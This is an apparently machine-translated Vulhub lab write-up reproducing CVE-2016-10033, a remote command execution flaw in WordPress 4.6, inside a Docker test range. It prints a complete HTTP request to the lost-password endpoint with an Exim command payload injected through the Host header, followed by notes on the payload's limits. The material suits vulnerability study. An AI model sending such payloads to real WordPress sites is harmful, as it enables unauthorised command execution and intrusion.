Vulhub vulnerability recurrence 74_ Wordpress

CVE-2016-10033_Wordpress 4.6 Arbitrary command execution vulnerability （PwnScriptum）

Loophole principle

Reference resources https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

Test environment

shooting range :192.168.4.10_ubuntu

Compile and run the test environment

#docker-compose build

#docker-compose up -d

because Mysql Initialization takes some time , So please wait . After successful operation , visit `http://your-ip:8080/` Open the site , After initializing the administrator user name and password, you can use （ The database has been configured , And will not be automatically updated ）.

Test and EXP Use

Send the following packets

```

POST /wp-login.php?action=lostpassword HTTP/1.1

Host: target(any [email protected] -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)

Connection: close

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Accept: */*

Content-Length: 56

Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=root

```

  so `/tmp/success` Created successfully ：

But in practice , There are still some pits to step through . There are several specific pits ：

1. The command executed cannot contain a large number of special characters , Such as `:`、 Quotation marks, etc .

2. Commands will be converted to lowercase letters

3. The command requires an absolute path

4. You need to know the user name of an existing user

Exploit

Use msf Reappear